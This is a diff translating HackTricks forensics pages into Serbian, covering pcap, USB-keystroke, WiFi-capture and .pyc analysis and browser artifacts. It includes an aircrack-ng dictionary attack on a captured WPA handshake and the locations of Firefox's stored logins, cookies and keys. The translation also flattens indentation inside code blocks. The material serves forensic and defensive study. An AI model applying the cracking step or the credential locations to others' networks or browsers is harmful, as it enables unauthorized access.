+Možete koristiti alate kao što su [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) za parsiranje kredencijala iz pcap-a ili sa aktivnog interfejsa.
 
-

-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
-## Check Exploits/Malware
+## Proverite Eksploite/Malver
 
 ### Suricata
 
-**Install and setup**
-
+**Instalirajte i postavite**
 ```
 apt-get install suricata
 apt-get install oinkmaster
 echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
 oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
 ```
-
-**Check pcap**
-
+**Proveri pcap**
 ```
 suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
 ```
-
 ### YaraPcap
 
-[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that
+[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) je alat koji
 
-- Reads a PCAP File and Extracts Http Streams.
-- gzip deflates any compressed streams
-- Scans every file with yara
-- Writes a report.txt
-- Optionally saves matching files to a Dir
+- Čita PCAP datoteku i ekstraktuje Http tokove.
+- gzip dekompresuje sve kompresovane tokove
+- Skandira svaku datoteku sa yara
+- Piše report.txt
+- Opcionalno čuva odgovarajuće datoteke u direktorijum
 
 ### Malware Analysis
 
-Check if you can find any fingerprint of a known malware:
+Proverite da li možete pronaći bilo koji otisak poznatog malvera:
 
 {{#ref}}
 ../malware-analysis.md
@@ -146,12 +122,11 @@ Check if you can find any fingerprint of a known malware:
 
 ## Zeek
 
-> [Zeek](https://docs.zeek.org/en/master/about.html) is a passive, open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting.
+> [Zeek](https://docs.zeek.org/en/master/about.html) je pasivni, open-source analizator mrežnog saobraćaja. Mnogi operateri koriste Zeek kao Mrežni Sigurnosni Monitor (NSM) za podršku istragama sumnjivih ili zlonamernih aktivnosti. Zeek takođe podržava širok spektar zadataka analize saobraćaja van domena sigurnosti, uključujući merenje performansi i rešavanje problema.
 
-Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are.
+U suštini, logovi koje kreira `zeek` nisu **pcaps**. Stoga ćete morati koristiti **druge alate** za analizu logova gde se nalaze **informacije** o pcaps. 
 
 ### Connections Info
-
 ```bash
 #Get info about longest connections (add "grep udp" to see only udp traffic)
 #The longest connection might be of malware (constant reverse shell?)
@@ -201,9 +176,7 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top
 1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0
 0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0
 ```
-
-### DNS info
-
+### DNS informacije
 ```bash
 #Get info about each DNS request performed
 cat dns.log | zeek-cut -c id.orig_h query qtype_name answers
@@ -220,8 +193,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
 #See top DNS domain requested with rita
 rita show-exploded-dns -H --limit 10 zeek_logs
 ```
-
-## Other pcap analysis tricks
+## Ostali trikovi analize pcap-a
 
 {{#ref}}
 dnscat-exfiltration.md
@@ -237,10 +209,4 @@ usb-keystrokes.md
 
 ​
 
-

-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md
index 9f63fbab3..08879f2d9 100644
--- a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md
+++ b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md
@@ -1,12 +1,12 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-If you have a pcap of a USB connection with a lot of Interruptions probably it is a USB Keyboard connection.
+Ako imate pcap datoteku USB veze sa mnogo prekida, verovatno se radi o USB tastaturi.
 
-A wireshark filter like this could be useful: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
+Wireshark filter poput ovog može biti koristan: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
 
-It could be important to know that the data that starts with "02" is pressed using shift.
+Može biti važno znati da podaci koji počinju sa "02" predstavljaju pritisnuti taster uz pritisnut shift.
 
-You can read more information and find some scripts about how to analyse this in:
+Možete pročitati više informacija i pronaći neke skripte o tome kako analizirati ovo na:
 
 - [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
 - [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
index 9c3dba419..08adf63e1 100644
--- a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
+++ b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
@@ -1,17 +1,15 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-If you have a pcap containing the communication via USB of a keyboard like the following one:
+Ako imate pcap koji sadrži komunikaciju putem USB-a tastature kao što je sledeća:
 
 ![](<../../../images/image (613).png>)
 
-You can use the tool [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) to get what was written in the communication:
-
+Možete koristiti alat [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) da dobijete ono što je napisano u komunikaciji:
 ```bash
 tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt
 python3 usbkeyboard.py ./keystrokes.txt
 ```
-
-You can read more information and find some scripts about how to analyse this in:
+Možete pročitati više informacija i pronaći neke skripte o tome kako analizirati ovo na:
 
 - [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
 - [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
index 36413cf70..54f5521e0 100644
--- a/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
+++ b/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
@@ -1,8 +1,8 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-# Check BSSIDs
+# Proverite BSSID-ove
 
-When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_:
+Kada primite snimak čiji je glavni saobraćaj Wifi koristeći WireShark, možete početi da istražujete sve SSID-ove snimka sa _Wireless --> WLAN Traffic_:
 
 ![](<../../../images/image (424).png>)
 
@@ -10,29 +10,27 @@ When you receive a capture whose principal traffic is Wifi using WireShark you c
 
 ## Brute Force
 
-One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`:
-
+Jedna od kolona na tom ekranu pokazuje da li je **bilo kakva autentifikacija pronađena unutar pcap-a**. Ako je to slučaj, možete pokušati da je brute force-ujete koristeći `aircrack-ng`:
 ```bash
 aircrack-ng -w pwds-file.txt -b  file.pcap
 ```
+Na primer, dobiće WPA lozinku koja štiti PSK (pre shared-key), koja će biti potrebna za dekriptovanje saobraćaja kasnije.
 
-For example it will retrieve the WPA passphrase protecting a PSK (pre shared-key), that will be required to decrypt the trafic later.
+# Podaci u Beacon-ima / Sporedni Kanal
 
-# Data in Beacons / Side Channel
+Ako sumnjate da se **podaci curi unutar beacon-a Wifi mreže**, možete proveriti beacon-e mreže koristeći filter kao što je sledeći: `wlan contains `, ili `wlan.ssid == "NAMEofNETWORK"` pretražujući unutar filtriranih paketa za sumnjive stringove.
 
-If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains `, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings.
+# Pronađite Nepoznate MAC Adrese u Wifi Mreži
 
-# Find Unknown MAC Addresses in A Wifi Network
-
-The following link will be useful to find the **machines sending data inside a Wifi Network**:
+Sledeći link će biti koristan za pronalaženje **mašina koje šalju podatke unutar Wifi mreže**:
 
 - `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2`
 
-If you already know **MAC addresses you can remove them from the output** adding checks like this one: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
+Ako već znate **MAC adrese, možete ih ukloniti iz izlaza** dodajući provere kao što je ova: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
 
-Once you have detected **unknown MAC** addresses communicating inside the network you can use **filters** like the following one: `wlan.addr== && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic.
+Kada detektujete **nepoznate MAC** adrese koje komuniciraju unutar mreže, možete koristiti **filtre** kao što je sledeći: `wlan.addr== && (ftp || http || ssh || telnet)` da filtrirate njihov saobraćaj. Imajte na umu da su ftp/http/ssh/telnet filteri korisni ako ste dekriptovali saobraćaj.
 
-# Decrypt Traffic
+# Dekriptovanje Saobraćaja
 
 Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
 
diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
index ec397e99a..026c10b2a 100644
--- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
+++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
@@ -1,77 +1,61 @@
-# Decompile compiled python binaries (exe, elf) - Retreive from .pyc
+# Decompilacija kompajliranih python binarnih fajlova (exe, elf) - Preuzimanje iz .pyc
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
-
-## From Compiled Binary to .pyc
-
-From an **ELF** compiled binary you can **get the .pyc** with:
+## Od kompajliranog binarnog fajla do .pyc
 
+Iz **ELF** kompajliranog binarnog fajla možete **dobiti .pyc** sa:
 ```bash
 pyi-archive_viewer 
 # The list of python modules will be given here:
 [(0, 230, 311, 1, 'm', 'struct'),
- (230, 1061, 1792, 1, 'm', 'pyimod01_os_path'),
- (1291, 4071, 8907, 1, 'm', 'pyimod02_archive'),
- (5362, 5609, 13152, 1, 'm', 'pyimod03_importers'),
- (10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'),
- (12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'),
- (13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'),
- (13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'),
- (15090, 445, 672, 1, 's', 'pyi_rth_inspect'),
- (15535, 2514, 4421, 1, 's', 'binary_name'),
+(230, 1061, 1792, 1, 'm', 'pyimod01_os_path'),
+(1291, 4071, 8907, 1, 'm', 'pyimod02_archive'),
+(5362, 5609, 13152, 1, 'm', 'pyimod03_importers'),
+(10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'),
+(12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'),
+(13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'),
+(13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'),
+(15090, 445, 672, 1, 's', 'pyi_rth_inspect'),
+(15535, 2514, 4421, 1, 's', 'binary_name'),
 ...
 
 ? X binary_name
 to filename? /tmp/binary.pyc
 ```
-
-In a **python exe binary** compiled you can **get the .pyc** by running:
-
+U **python exe binarnom** kompajliranom možete **dobiti .pyc** pokretanjem:
 ```bash
 python pyinstxtractor.py executable.exe
 ```
+## Od .pyc do python koda
 
-## From .pyc to python code
-
-For the **.pyc** data ("compiled" python) you should start trying to **extract** the **original** **python** **code**:
-
+Za **.pyc** podatke ("kompilirani" python) trebali biste početi pokušavati da **izvučete** **originalni** **python** **kod**:
 ```bash
 uncompyle6 binary.pyc  > decompiled.py
 ```
+**Budite sigurni** da binarni fajl ima **ekstenziju** "**.pyc**" (ako ne, uncompyle6 neće raditi)
 
-**Be sure** that the binary has the **extension** "**.pyc**" (if not, uncompyle6 is not going to work)
-
-While executing **uncompyle6** you might find the **following errors**:
-
-### Error: Unknown magic number 227
+Tokom izvršavanja **uncompyle6** mogli biste naići na **sledeće greške**:
 
+### Greška: Nepoznat magični broj 227
 ```bash
 /kali/.local/bin/uncompyle6 /tmp/binary.pyc
 Unknown magic number 227 in /tmp/binary.pyc
 ```
+Da biste to popravili, potrebno je da **dodate ispravan magični broj** na početku generisanog fajla.
 
-To fix this you need to **add the correct magic number** at the beginning of the generated file.
-
-**Magic numbers vary with the python version**, to get the magic number of **python 3.8** you will need to **open a python 3.8** terminal and execute:
-
+**Magični brojevi se razlikuju u zavisnosti od verzije pythona**, da biste dobili magični broj za **python 3.8**, potrebno je da **otvorite python 3.8** terminal i izvršite:
 ```
 >> import imp
 >> imp.get_magic().hex()
 '550d0d0a'
 ```
+**Magični broj** u ovom slučaju za python3.8 je **`0x550d0d0a`**, zatim, da biste ispravili ovu grešku, moraćete da **dodate** na **početak** **.pyc datoteke** sledeće bajtove: `0x0d550a0d000000000000000000000000`
 
-The **magic number** in this case for python3.8 is **`0x550d0d0a`**, then, to fix this error you will need to **add** at the **beginning** of the **.pyc file** the following bytes: `0x0d550a0d000000000000000000000000`
-
-**Once** you have **added** that magic header, the **error should be fixed.**
-
-This is how a correctly added **.pyc python3.8 magic header** will look like:
+**Jednom** kada ste **dodali** taj magični zaglavlje, **greška bi trebala biti ispravljena.**
 
+Ovako će izgledati ispravno dodato **.pyc python3.8 magično zaglavlje**:
 ```bash
 hexdump 'binary.pyc' | head
 0000000 0d55 0a0d 0000 0000 0000 0000 0000 0000
@@ -79,25 +63,23 @@ hexdump 'binary.pyc' | head
 0000020 0700 0000 4000 0000 7300 0132 0000 0064
 0000030 0164 006c 005a 0064 0164 016c 015a 0064
 ```
+### Greška: Decompiling generic errors
 
-### Error: Decompiling generic errors
+**Druge greške** kao što su: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` mogu se pojaviti.
 
-**Other errors** like: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` may appear.
+To verovatno znači da **niste ispravno dodali** magični broj ili da niste **koristili** **ispravan magični broj**, pa se **pobrinite da koristite ispravan** (ili pokušajte novi).
 
-This probably means that you **haven't added correctly** the magic number or that you haven't **used** the **correct magic number**, so make **sure you use the correct one** (or try a new one).
+Proverite dokumentaciju o prethodnim greškama.
 
-Check the previous error documentation.
+## Automatski alat
 
-## Automatic Tool
+[**python-exe-unpacker alat**](https://github.com/countercept/python-exe-unpacker) služi kao kombinacija nekoliko alata dostupnih u zajednici, dizajniranih da pomognu istraživačima u raspakivanju i decompiling izvršnih datoteka napisanih u Pythonu, posebno onih kreiranih sa py2exe i pyinstaller. Uključuje YARA pravila za identifikaciju da li je izvršna datoteka zasnovana na Pythonu i potvrđuje alat za kreiranje.
 
-The [**python-exe-unpacker tool**](https://github.com/countercept/python-exe-unpacker) serves as a combination of several community-available tools designed to assist researchers in unpacking and decompiling executables written in Python, specifically those created with py2exe and pyinstaller. It includes YARA rules to identify if an executable is Python-based and confirms the creation tool.
+### ImportError: Ime datoteke: 'unpacked/malware_3.exe/**pycache**/archive.cpython-35.pyc' ne postoji
 
-### ImportError: File name: 'unpacked/malware_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist
-
-A common issue encountered involves an incomplete Python bytecode file resulting from the **unpacking process with unpy2exe or pyinstxtractor**, which then **fails to be recognized by uncompyle6 due to a missing Python bytecode version number**. To address this, a prepend option has been added, which appends the necessary Python bytecode version number, facilitating the decompiling process.
-
-Example of the issue:
+Uobičajen problem koji se javlja uključuje nepotpunu Python bytecode datoteku koja je rezultat **procesa raspakivanja sa unpy2exe ili pyinstxtractor**, koja zatim **ne može biti prepoznata od strane uncompyle6 zbog nedostatka broja verzije Python bytecode-a**. Da bi se to rešilo, dodata je opcija za preklapanje, koja dodaje neophodan broj verzije Python bytecode-a, olakšavajući proces decompiling-a.
 
+Primer problema:
 ```python
 # Error when attempting to decompile without the prepend option
 test@test: uncompyle6 unpacked/malware_3.exe/archive.py
@@ -115,11 +97,9 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
 # Successfully decompiled file
 [+] Successfully decompiled.
 ```
+## Analiza python asemblera
 
-## Analyzing python assembly
-
-If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **disassemble** the _.pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2:
-
+Ako niste mogli da izvučete "originalni" python kod prateći prethodne korake, možete pokušati da **izvučete** **asembler** (ali **nije baš opisno**, pa **pokušajte** ponovo da izvučete originalni kod). U [ovde](https://bits.theorem.co/protecting-a-python-codebase/) sam pronašao vrlo jednostavan kod za **dezintegraciju** _.pyc_ binarnog fajla (srećno sa razumevanjem toka koda). Ako je _.pyc_ iz python2, koristite python2:
 ```bash
 >>> import dis
 >>> import marshal
@@ -145,34 +125,32 @@ True
 >>>
 >>> # Disassemble the code object
 >>> dis.disassemble(code)
-  1           0 LOAD_CONST               0 ()
-              3 MAKE_FUNCTION            0
-              6 STORE_NAME               0 (hello_world)
-              9 LOAD_CONST               1 (None)
-             12 RETURN_VALUE
+1           0 LOAD_CONST               0 ()
+3 MAKE_FUNCTION            0
+6 STORE_NAME               0 (hello_world)
+9 LOAD_CONST               1 (None)
+12 RETURN_VALUE
 >>>
 >>> # Also disassemble that const being loaded (our function)
 >>> dis.disassemble(code.co_consts[0])
-  2           0 LOAD_CONST               1 ('Hello  {0}')
-              3 LOAD_ATTR                0 (format)
-              6 LOAD_FAST                0 (name)
-              9 CALL_FUNCTION            1
-             12 PRINT_ITEM
-             13 PRINT_NEWLINE
-             14 LOAD_CONST               0 (None)
-             17 RETURN_VALUE
+2           0 LOAD_CONST               1 ('Hello  {0}')
+3 LOAD_ATTR                0 (format)
+6 LOAD_FAST                0 (name)
+9 CALL_FUNCTION            1
+12 PRINT_ITEM
+13 PRINT_NEWLINE
+14 LOAD_CONST               0 (None)
+17 RETURN_VALUE
 ```
+## Python u izvršni fajl
 
-## Python to Executable
+Da počnemo, pokažaćemo vam kako se payloadi mogu kompajlirati u py2exe i PyInstaller.
 
-To start, we’re going to show you how payloads can be compiled in py2exe and PyInstaller.
-
-### To create a payload using py2exe:
-
-1. Install the py2exe package from [http://www.py2exe.org/](http://www.py2exe.org)
-2. For the payload (in this case, we will name it hello.py), use a script like the one in Figure 1. The option “bundle_files” with the value of 1 will bundle everything including the Python interpreter into one exe.
-3. Once the script is ready, we will issue the command “python setup.py py2exe”. This will create the executable, just like in Figure 2.
+### Da kreirate payload koristeći py2exe:
 
+1. Instalirajte py2exe paket sa [http://www.py2exe.org/](http://www.py2exe.org)
+2. Za payload (u ovom slučaju, nazvaćemo ga hello.py), koristite skriptu kao što je prikazano na Slici 1. Opcija “bundle_files” sa vrednošću 1 će sve spojiti, uključujući Python interpreter, u jedan exe.
+3. Kada je skripta spremna, izdaćemo komandu “python setup.py py2exe”. Ovo će kreirati izvršni fajl, baš kao na Slici 2.
 ```python
 from distutils.core import setup
 import py2exe, sys, os
@@ -180,10 +158,10 @@ import py2exe, sys, os
 sys.argv.append('py2exe')
 
 setup(
-    options = {'py2exe': {'bundle_files': 1}},
-    #windows = [{'script': "hello.py"}],
-  console = [{'script': "hello.py"}],
-    zipfile = None,
+options = {'py2exe': {'bundle_files': 1}},
+#windows = [{'script': "hello.py"}],
+console = [{'script': "hello.py"}],
+zipfile = None,
 )
 ```
 
@@ -200,12 +178,10 @@ running py2exe
 copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe
 Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe
 ```
+### Da biste kreirali payload koristeći PyInstaller:
 
-### To create a payload using PyInstaller:
-
-1. Install PyInstaller using pip (pip install pyinstaller).
-2. After that, we will issue the command “pyinstaller –onefile hello.py” (a reminder that ‘hello.py’ is our payload). This will bundle everything into one executable.
-
+1. Instalirajte PyInstaller koristeći pip (pip install pyinstaller).
+2. Nakon toga, izdaćemo komandu “pyinstaller –onefile hello.py” (podsećanje da je ‘hello.py’ naš payload). Ovo će sve spojiti u jedan izvršni fajl.
 ```
 C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
 108 INFO: PyInstaller: 3.3.1
@@ -218,15 +194,9 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
 5982 INFO: Appending archive to EXE C:\Users\test\Desktop\test\dist\hello.exe
 6325 INFO: Building EXE from out00-EXE.toc completed successfully.
 ```
-
-## References
+## Reference
 
 - [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
 
-

-
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
index 76fa3ef23..df3900540 100644
--- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
+++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
@@ -1,6 +1,6 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-Here you can find interesting tricks for specific file-types and/or software:
+Ovde možete pronaći zanimljive trikove za specifične tipove fajlova i/ili softver:
 
 {{#ref}}
 .pyc.md
diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
index ba35ea1fd..d8a221d6d 100644
--- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
+++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
@@ -2,138 +2,128 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
 ## Browsers Artifacts 
 
-Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types.
+Browser artifacts uključuju različite tipove podataka koje čuvaju web pregledači, kao što su istorija navigacije, obeleživači i podaci iz keša. Ovi artefakti se čuvaju u specifičnim folderima unutar operativnog sistema, koji se razlikuju po lokaciji i imenu među pregledačima, ali generalno čuvaju slične tipove podataka.
 
-Here's a summary of the most common browser artifacts:
+Evo sažetak najčešćih browser artefakata:
 
-- **Navigation History**: Tracks user visits to websites, useful for identifying visits to malicious sites.
-- **Autocomplete Data**: Suggestions based on frequent searches, offering insights when combined with navigation history.
-- **Bookmarks**: Sites saved by the user for quick access.
-- **Extensions and Add-ons**: Browser extensions or add-ons installed by the user.
-- **Cache**: Stores web content (e.g., images, JavaScript files) to improve website loading times, valuable for forensic analysis.
-- **Logins**: Stored login credentials.
-- **Favicons**: Icons associated with websites, appearing in tabs and bookmarks, useful for additional information on user visits.
-- **Browser Sessions**: Data related to open browser sessions.
-- **Downloads**: Records of files downloaded through the browser.
-- **Form Data**: Information entered in web forms, saved for future autofill suggestions.
-- **Thumbnails**: Preview images of websites.
-- **Custom Dictionary.txt**: Words added by the user to the browser's dictionary.
+- **Navigacija Istorija**: Prati posete korisnika web sajtovima, korisno za identifikaciju poseta zlonamernim sajtovima.
+- **Podaci za Autocomplete**: Predlozi zasnovani na čestim pretragama, nude uvid kada se kombinuju sa istorijom navigacije.
+- **Obeleživači**: Sajtovi koje je korisnik sačuvao za brzi pristup.
+- **Ekstenzije i Dodaci**: Ekstenzije ili dodaci pregledača koje je instalirao korisnik.
+- **Keš**: Čuva web sadržaj (npr. slike, JavaScript datoteke) kako bi poboljšao vreme učitavanja sajtova, vredno za forenzičku analizu.
+- **Prijave**: Sačuvane prijavne informacije.
+- **Favicons**: Ikone povezane sa web sajtovima, koje se pojavljuju u karticama i obeleživačima, korisne za dodatne informacije o posetama korisnika.
+- **Sesije Pregledača**: Podaci vezani za otvorene sesije pregledača.
+- **Preuzimanja**: Zapisnici datoteka preuzetih putem pregledača.
+- **Podaci iz Formi**: Informacije unesene u web forme, sačuvane za buduće predloge za automatsko popunjavanje.
+- **Sličice**: Pregledne slike web sajtova.
+- **Custom Dictionary.txt**: Reči koje je korisnik dodao rečniku pregledača.
 
 ## Firefox
 
-Firefox organizes user data within profiles, stored in specific locations based on the operating system:
+Firefox organizuje korisničke podatke unutar profila, koji se čuvaju na specifičnim lokacijama u zavisnosti od operativnog sistema:
 
 - **Linux**: `~/.mozilla/firefox/`
 - **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/`
 - **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\`
 
-A `profiles.ini` file within these directories lists the user profiles. Each profile's data is stored in a folder named in the `Path` variable within `profiles.ini`, located in the same directory as `profiles.ini` itself. If a profile's folder is missing, it may have been deleted.
+Datoteka `profiles.ini` unutar ovih direktorijuma sadrži listu korisničkih profila. Podaci svakog profila se čuvaju u folderu nazvanom u `Path` varijabli unutar `profiles.ini`, koji se nalazi u istom direktorijumu kao i `profiles.ini`. Ako nedostaje folder profila, možda je obrisan.
 
-Within each profile folder, you can find several important files:
+Unutar svakog foldera profila možete pronaći nekoliko važnih datoteka:
 
-- **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data.
-  - Use specific SQL queries to extract history and downloads information.
-- **bookmarkbackups**: Contains backups of bookmarks.
-- **formhistory.sqlite**: Stores web form data.
-- **handlers.json**: Manages protocol handlers.
-- **persdict.dat**: Custom dictionary words.
-- **addons.json** and **extensions.sqlite**: Information on installed add-ons and extensions.
-- **cookies.sqlite**: Cookie storage, with [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) available for inspection on Windows.
-- **cache2/entries** or **startupCache**: Cache data, accessible through tools like [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html).
-- **favicons.sqlite**: Stores favicons.
-- **prefs.js**: User settings and preferences.
-- **downloads.sqlite**: Older downloads database, now integrated into places.sqlite.
-- **thumbnails**: Website thumbnails.
-- **logins.json**: Encrypted login information.
-- **key4.db** or **key3.db**: Stores encryption keys for securing sensitive information.
+- **places.sqlite**: Čuva istoriju, obeleživače i preuzimanja. Alati poput [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) na Windows-u mogu pristupiti podacima o istoriji.
+- Koristite specifične SQL upite za ekstrakciju informacija o istoriji i preuzimanjima.
+- **bookmarkbackups**: Sadrži rezervne kopije obeleživača.
+- **formhistory.sqlite**: Čuva podatke iz web formi.
+- **handlers.json**: Upravljanje protokolima.
+- **persdict.dat**: Reči iz prilagođenog rečnika.
+- **addons.json** i **extensions.sqlite**: Informacije o instaliranim dodacima i ekstenzijama.
+- **cookies.sqlite**: Skladištenje kolačića, uz [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) dostupno za inspekciju na Windows-u.
+- **cache2/entries** ili **startupCache**: Podaci iz keša, dostupni putem alata kao što je [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html).
+- **favicons.sqlite**: Čuva favicone.
+- **prefs.js**: Korisničke postavke i preferencije.
+- **downloads.sqlite**: Starija baza podataka preuzimanja, sada integrisana u places.sqlite.
+- **thumbnails**: Sličice web sajtova.
